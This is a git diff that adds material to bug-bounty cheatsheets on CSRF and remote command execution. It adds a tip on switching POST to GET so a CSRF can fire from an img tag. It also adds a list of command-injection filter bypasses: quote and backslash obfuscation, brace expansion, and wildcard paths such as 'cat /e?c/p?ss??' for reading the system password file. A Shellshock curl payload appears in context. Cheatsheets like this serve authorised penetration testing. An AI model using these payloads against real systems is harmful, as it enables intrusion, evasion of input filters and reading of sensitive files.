diff --git a/cheatsheets/bugbountytips.md b/cheatsheets/bugbountytips.md index ae268db..d678d96 100644 --- a/cheatsheets/bugbountytips.md +++ b/cheatsheets/bugbountytips.md @@ -29,3 +29,10 @@ Look for *hackathon-related* assets. What I mean by this is sometimes companies **Tip #6** Keep all your directory brute force results so when a CVE like Drupalgeddon2 comes out, you can look for previously found instances (cat dirsearch/reports/*/* | grep INSTALL.mysql.txt | grep 200 | less)/ + + + +**Tip #7** + +When you have a form, always try to change the request method from POST to GET in order to improve the CVSS score. +For example, demonstrating a CSRF can be exploited simply by using \[img\] tag is better than having to send a link to the victim. diff --git a/cheatsheets/rce.md b/cheatsheets/rce.md index 66d39cf..7ddfc73 100644 --- a/cheatsheets/rce.md +++ b/cheatsheets/rce.md @@ -10,6 +10,27 @@ strŅ–ng If the target is running their application in debug mode you might be able to run commands. If you are running the target locally, you can probably brute-force the debugger PIN. The debugger PIN is always in the following format: `***-***-***`. +**Basic Bypasses** + +``` +i'''d +i"""d +``` + +``` +\l\s -l\a\h +``` + +``` +cat /e?c/p?ss?? +cat /e??/??ss* +``` + +``` +{ls,} +{ls,-a} +``` + **Shellshock Bug** ```bash @@ -18,4 +39,4 @@ If the target is running their application in debug mode you might be able to ru ```zsh curl -H "User-Agent: () { :; }; /bin/eject" http://example.com/ -``` \ No newline at end of file +```